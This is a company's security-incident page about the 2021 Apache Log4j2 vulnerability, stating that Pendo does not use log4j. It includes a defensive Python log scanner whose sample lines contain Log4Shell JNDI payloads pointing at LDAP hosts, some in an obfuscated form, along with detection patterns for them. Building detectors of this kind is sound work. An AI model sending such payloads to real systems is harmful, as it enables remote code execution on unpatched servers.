Pendo Response to Industry Security Incidents

Overview

When third-party security and technology companies disclose breaches and other security events, Pendo often receives questions about whether and how those incidents affect us. In line with our Core Values of Be Direct and Transparent and Maniacal Focus on the Customer, we want to make it easier for our customers to find out whether widely publicized breaches and events affect Pendo products. We continuously review and analyze industry security incidents and will update this page when new material incidents arise and information related to Pendo is available. If Pendo customers are impacted by any third-party security breach or event, we will, in addition to updating this page, notify the relevant customers in accordance with our Incident Response Process.

Incidents

Date: First reported December 13, 2021; latest update December 23, 2021

Organization/Product: Apache Log4j2

Incident Overview: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. As a result, an attacker who can control log messages or log message parameters on systems that use Log4j could execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Pendo Impact:

12/23/2021 Update:
We are continuing to review information provided by our vendors and are implementing recommended changes to third-party services where needed.

Out of an abundance of caution, we are also reviewing our logs and systems for potential indicators of compromise. At present, we have not seen evidence that Pendo products have been impacted.

12/13/2021:
Pendo products have not been impacted by this issue.

Our Security and Engineering teams have performed a thorough investigation and determined that we are not using the log4j library in our code base.

We are also in contact with our key service providers regarding any potential impact that they may have experienced. Given the critical nature of the log4j vulnerability, we are continuing to assess new information as it becomes available and will provide updates here as needed.
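The "reviewing our logs for potential indicators of compromise" step above comes down to finding log-message content that would trigger a Log4j2 JNDI lookup. The following is an added illustration, not Pendo's own tooling: it scans constructed sample request-log lines, first collapsing the nested `${lower:...}` and `${...:-x}` lookup forms that are commonly used to hide the literal string `jndi`, and reports the lines that still contain a JNDI lookup after normalization. The log lines, IP addresses and hostnames are all made up for the example.

```python
import re

# Constructed sample lines in a common access-log shape (user-agent in the last field).
# These are invented for the example and are not real traffic or real Pendo data.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /api/v1/health HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://x.example/b}"',
    '10.0.0.7 - - "GET /docs HTTP/1.1" 200 "curl/7.79.1"',
]

# ${lower:j} / ${upper:J} -> the bare character, the simplest nesting trick.
NESTED_CASE = re.compile(r"\$\{(?:lower|upper):([A-Za-z0-9]+)\}", re.IGNORECASE)
# ${anything:-x} -> x: Log4j's default-value syntax, e.g. ${env:NOPE:-j} or ${::-j}.
NESTED_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# What a Log4j2 message lookup actually needs to see to start a JNDI resolution.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Repeatedly unwrap nested lookups so obfuscated forms converge on the plain one.

    The pass count is bounded so adversarial input cannot keep the scanner busy forever.
    """
    for _ in range(max_rounds):
        unwrapped = NESTED_CASE.sub(lambda m: m.group(1), text)
        unwrapped = NESTED_DEFAULT.sub(lambda m: m.group(1), unwrapped)
        if unwrapped == text:
            break
        text = unwrapped
    return text


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup after obfuscation is removed."""
    return bool(JNDI_LOOKUP.search(normalize(line)))


def scan(lines):
    """Return (line_index, normalized_line) for every line that would trigger a lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_suspicious(line)]


if __name__ == "__main__":
    for index, shown in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: {shown}")
```

Run against real logs, the same scan function can be fed line by line from a file; matches are a reason to investigate, not proof of compromise, since the target system must also run a vulnerable Log4j2 version with lookups enabled.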

In addition to the incident listed above, there may be other security incidents that we are reviewing. Because security incident details can contain sensitive information that could be used maliciously, or because an incident is not widespread, we are unable to publish information about every incident we review.

Footnote: In the interest of giving credit where credit is due, we’d like to thank our friends at Code42 for providing an excellent example of how to proactively share information with the community.